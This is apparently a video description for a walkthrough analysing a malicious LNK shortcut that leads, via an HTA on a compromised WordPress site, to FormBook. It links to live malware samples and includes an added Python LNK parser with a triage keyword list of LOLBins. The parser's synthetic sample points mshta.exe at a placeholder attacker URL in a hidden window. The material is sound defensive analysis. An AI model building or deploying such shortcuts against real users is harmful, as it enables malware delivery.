MALWARE on WordPress site | LNK file MALWARE ANALYSIS and HTA Deobfuscation
Analysis of a malicious LNK file which uses a compromised Uzbekistan website to launch a malicious HTA file, which in turn downloads and runs FormBook malware.
** Find me at **
Twitter/X - https://twitter.com/CyberRaiju
Blog - https://www.jaiminton.com/
Mastodon - https://infosec.exchange/@CyberRaiju
** Tools **
FLARE VM - https://github.com/mandiant/flare-vm
Notepad++ - https://notepad-plus-plus.org/
HxD - https://mh-nexus.de/en/hxd/
Urlscan - https://urlscan.io/
CyberChef - https://github.com/gchq/CyberChef
Detect-It-Easy - https://github.com/horsicq/Detect-It-Easy
LECmd - https://ericzimmerman.github.io/#!index.md
Link Parser - https://code.google.com/archive/p/link-parser
** Sample **
https://bazaar.abuse.ch/sample/77e14caae3daf05c1f5a6a3d10e4936cc58944d6ae9ec6943b1be6d995e94b5c/
https://bazaar.abuse.ch/sample/075d39cc0b27cbdb32eaffbf1a4536fdafc5238c7eba1e32c2001d9862e0fe7b
https://urlscan.io/responses/c1fb5c1305d935a96ad60a093298ecff9b3f309b446678fd6dcb619a4ac61b06/
** Website Scans **
https://urlscan.io/result/5271d468-7940-45a0-a32b-d823cd8eb61d/
https://urlscan.io/result/fc3a005d-ec54-4ea7-899e-41225f483ce5/#summary
https://urlscan.io/result/de9ff7fe-e1be-4902-bab4-a79466e3fd12/#summary
** Further Reading **
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-identifiers
https://attack.mitre.org/software/S1074/
** Timestamps **
00:00 - Intro
00:13 - LNK shortcut file overview
01:02 - Analysing LNK files
02:04 - Mshta.exe running malicious .hta
02:42 - Parsing malicious LNK files
03:15 - LNK Parser Cmd
03:51 - Understanding Security Identifiers
04:30 - Tracking overlap between malicious LNK files
04:52 - LECmd
05:35 - Demonstrating useful LNK attributes
07:00 - Analysing compromised Wordpress website
07:54 - Analysing malicious HTA file
09:12 - Deobfuscating HTA with CyberChef
12:15 - Analysing 3rd stage payload
13:28 - Malware author mistake
14:56 - Deobfuscating PowerShell with CyberChef
15:48 - Locating final payload
16:56 - Outro
Credits:
SFX by Pixabay
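As an added example (not code from the video or from Jai Minton), the following Python script does the kind of LNK parsing the chapters above walk through: it checks the header size and LinkCLSID, skips the LinkTargetIDList and LinkInfo structures, pulls the StringData fields (relative path, working directory, arguments, icon location), decodes ShowCommand, and reads the NetBIOS machine name and MAC address out of the TrackerDataBlock, the fields used to track overlap between LNK files built on the same machine. It then applies a small triage pass for the traits a malicious shortcut tends to show (mshta/PowerShell/cmd as the real target, a URL in the arguments, a minimised window, an icon borrowed from another program). The shortcut it parses is constructed inline; its target path, URL, hostname and MAC are placeholders, not indicators from the campaign in the video.

```python
"""Minimal MS-SHLLINK (.lnk) parser for malware triage.

Added example, not code from the video or its author. The sample shortcut
built below is synthetic: its target, URL, NetBIOS name and MAC address
are placeholders, not indicators from the real FormBook campaign.
"""
import struct
import uuid
from datetime import datetime, timedelta, timezone

LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
HAS_IDLIST, HAS_LINKINFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
TRACKER_SIG = 0xA0000003  # ExtraData block signature of TrackerDataBlock
SHOW = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELPATH), ("working_dir", HAS_WORKDIR),
                 ("arguments", HAS_ARGS), ("icon_location", HAS_ICON))


def filetime(ft):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01) to a UTC datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_lnk(data):
    """Return header fields, StringData and TrackerDataBlock details from a .lnk blob."""
    if len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad HeaderSize or LinkCLSID")
    flags, _attrs, ctime, _atime, wtime, size, _icon_idx, show = struct.unpack_from("<IIQQQIiI", data, 20)
    info = {"flags": flags, "created": filetime(ctime), "modified": filetime(wtime),
            "size": size, "show_command": SHOW.get(show, str(show))}
    pos = 76
    if flags & HAS_IDLIST:    # IDListSize counts the ItemIDs plus the 2-byte TerminalID
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    is_unicode = bool(flags & IS_UNICODE)
    for name, bit in STRING_FIELDS:  # StringData: CountCharacters then the unterminated string
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2: pos + 2 + n * (2 if is_unicode else 1)]
            # assumption: the ANSI code page of a non-Unicode link is cp1252
            info[name] = raw.decode("utf-16-le" if is_unicode else "cp1252")
            pos += 2 + len(raw)
    while pos + 4 <= len(data):  # ExtraData blocks; a BlockSize < 4 is the TerminalBlock
        bsize = struct.unpack_from("<I", data, pos)[0]
        if bsize < 4:
            break
        if struct.unpack_from("<I", data, pos + 4)[0] == TRACKER_SIG:
            info["machine_id"] = data[pos + 16: pos + 32].split(b"\0", 1)[0].decode("ascii", "replace")
            droid_file = uuid.UUID(bytes_le=data[pos + 48: pos + 64])  # Droid file GUID (UUIDv1)
            info["droid_file"] = str(droid_file)
            node = droid_file.node  # UUIDv1 node field is the MAC of the machine that created the link
            info["mac"] = ":".join(f"{(node >> s) & 0xFF:02x}" for s in range(40, -1, -8))
        pos += bsize
    return info


def triage(info):
    """Flag the traits the video walks through: LOLBin targets, URLs, hidden windows, icon lures."""
    findings = []
    args = info.get("arguments", "")
    target = (info.get("relative_path", "") + " " + args).lower()
    for host in ("mshta", "powershell", "cmd.exe", "wscript", "cscript", "rundll32"):
        if host in target:
            findings.append(f"script/LOLBin host: {host}")
    if "http://" in args.lower() or "https://" in args.lower():
        findings.append("URL in arguments")
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("window minimised on launch (SW_SHOWMINNOACTIVE)")
    if len(args) > 200:
        findings.append(f"unusually long arguments ({len(args)} chars)")
    icon = info.get("icon_location", "").lower()
    if icon and not any(h in icon for h in ("mshta", "powershell", "cmd")):
        findings.append(f"icon borrowed from another program: {icon}")
    return findings


def build_sample_lnk():
    """Assemble a synthetic shortcut (constructed for this example, not a real sample)."""
    def ustr(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    flags = HAS_IDLIST | HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | HAS_ICON | IS_UNICODE
    ft = 133_000_000_000_000_000  # arbitrary FILETIME in mid-2022 (constructed)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack(
        "<IIQQQIiIHHII", flags, 0x20, ft, ft, ft, 0, 0, 7, 0, 0, 0, 0)  # ShowCommand 7 hides the window
    item = struct.pack("<H", 5) + b"\x01\x02\x03"  # one placeholder ItemID
    idlist = struct.pack("<H", len(item) + 2) + item + b"\x00\x00"
    strings = (ustr(r"..\..\Windows\System32\mshta.exe") + ustr(r"C:\Windows\System32")
               + ustr("https://compromised.example/wp-content/uploads/inv.hta")  # placeholder URL
               + ustr(r"%ProgramFiles%\Adobe\Acrobat.exe"))
    droid_file = uuid.uuid1(node=0x001122334455, clock_seq=0)  # placeholder MAC in the UUIDv1 node
    tracker = (struct.pack("<IIII", 0x60, TRACKER_SIG, 0x58, 0) + b"DESKTOP-EXAMPLE".ljust(16, b"\0")
               + uuid.UUID(int=0).bytes_le + droid_file.bytes_le)
    tracker += tracker[32:64]  # DroidBirth: same two GUIDs
    return header + idlist + strings + tracker + b"\x00\x00\x00\x00"


if __name__ == "__main__":
    parsed = parse_lnk(build_sample_lnk())
    for k, v in parsed.items():
        print(f"{k:14} {v}")
    print("findings:", *triage(parsed), sep="\n  ")
```

LECmd reports the same header, StringData and tracker fields (and far more); the point of the script is to show where in the file each of those values lives, and why two LNK files sharing a machine ID and MAC are worth clustering together.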
Video MALWARE on WordPress site | LNK file MALWARE ANALYSIS and HTA Deobfuscation from the channel Jai Minton - CyberRaiju
Video information
Published: 26 May 2024 10:35:44
Duration: 00:17:15